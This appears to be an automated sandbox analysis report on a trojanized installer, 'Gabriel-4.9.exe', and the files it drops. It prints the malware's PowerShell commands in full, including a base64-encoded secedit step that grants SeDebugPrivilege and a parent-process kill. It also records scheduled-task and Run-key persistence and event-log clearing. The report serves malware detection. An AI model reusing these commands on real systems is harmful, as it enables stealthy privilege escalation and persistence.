Suspicious powershell command line found

Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $mypid=(Get-WmiObject -Query 'select ParentProcessId from Win32_Process where ProcessId=3220').ParentProcessId;if($mypid){Stop-Process -Id $mypid -Force;}
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $mypid=(Get-WmiObject -Query 'select ParentProcessId from Win32_Process where ProcessId=3220').ParentProcessId;if($mypid){Stop-Process -Id $mypid -Force;}	Jump to behavior
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"

Source: C:\Users\user\Desktop\Gabriel-4.9.exe

Code function: 0_2_00007FF746501908 LoadLibraryA,GetProcAddress,FreeLibrary,

0_2_00007FF746501908

Source: initial sample

Static PE information: section where entry point is pointing to: .boot

Source: irsetup.exe.0.dr	Static PE information: real checksum: 0x4f4144 should be: 0x4f9bcf
Source: MTGHu7b.exe.2.dr	Static PE information: real checksum: 0x28669d should be: 0x28739a
Source: iusb3mon.exe.18.dr	Static PE information: real checksum: 0x28669d should be: 0x28739a

Source: irsetup.exe.0.dr	Static PE information: section name: text
Source: MTGHu7b.exe.2.dr	Static PE information: section name:
Source: MTGHu7b.exe.2.dr	Static PE information: section name:
Source: MTGHu7b.exe.2.dr	Static PE information: section name:
Source: MTGHu7b.exe.2.dr	Static PE information: section name:
Source: MTGHu7b.exe.2.dr	Static PE information: section name:
Source: MTGHu7b.exe.2.dr	Static PE information: section name: .winlice
Source: MTGHu7b.exe.2.dr	Static PE information: section name: .boot
Source: iusb3mon.exe.18.dr	Static PE information: section name:
Source: iusb3mon.exe.18.dr	Static PE information: section name:
Source: iusb3mon.exe.18.dr	Static PE information: section name:
Source: iusb3mon.exe.18.dr	Static PE information: section name:
Source: iusb3mon.exe.18.dr	Static PE information: section name:
Source: iusb3mon.exe.18.dr	Static PE information: section name: .winlice
Source: iusb3mon.exe.18.dr	Static PE information: section name: .boot

Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018001C378 push rdx; ret	2_2_000000018001C381
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018001C388 push rdx; ret	2_2_000000018001C389
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 30_2_00346074 push ecx; ret	30_2_00346087
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 30_2_003DDF66 push ebp; mov dword ptr [esp], 0000002Dh	30_2_005C7789
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 30_2_003DDF66 push 2959F19Dh; mov dword ptr [esp], ebp	30_2_005C77A3
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 30_2_003DDF66 push 212DDC73h; mov dword ptr [esp], ebp	30_2_005C77D3
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 30_2_06299E44 push eax; ret	30_2_06299E62
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 30_2_06299ED0 push eax; ret	30_2_06299EFE
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 30_2_062AE548 push ebp; retf	30_2_062AE54C
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 30_2_062AE541 push ebp; retf	30_2_062AE54C
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 30_2_062B4016 push ecx; iretd	30_2_062B4021
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 30_2_0625A403 push eax; ret	30_2_0625A421
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 30_2_0625A48F push eax; ret	30_2_0625A4BD
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 30_2_0626DD63 push edx; ret	30_2_0626DD66
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 30_2_0626DD9F push ss; ret	30_2_0626DDA2
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 30_2_0626EB00 push ebp; retf	30_2_0626EB0B

Source: MTGHu7b.exe.2.dr	Static PE information: section name: entropy: 7.976897601289494
Source: iusb3mon.exe.18.dr	Static PE information: section name: entropy: 7.976897601289494

Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	File created: C:\ProgramData\Program\iusb3mon.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	File created: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Gabriel-4.9.exe	File created: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\lua5.1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Gabriel-4.9.exe	File created: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	File created: C:\Program Files\product1\letsvpn-latest.exe	Jump to dropped file

Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe

File created: C:\ProgramData\Program\iusb3mon.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml

Source: C:\ProgramData\Program\iusb3mon.exe

30_2_062967CC

Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Microsoft
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Microsoft
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft

Source: C:\ProgramData\Program\iusb3mon.exe

Code function: 30_2_062A3F29 IsIconic,GetWindowPlacement,GetWindowRect,

30_2_062A3F29

Source: C:\ProgramData\Program\iusb3mon.exe

Code function: 30_2_06293B39 OpenEventLogA,ClearEventLogA,CloseEventLog,

30_2_06293B39

Source: C:\ProgramData\Program\iusb3mon.exe

Code function: 30_2_0629838B CreateThread,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,

30_2_0629838B

Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\Gabriel-4.9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
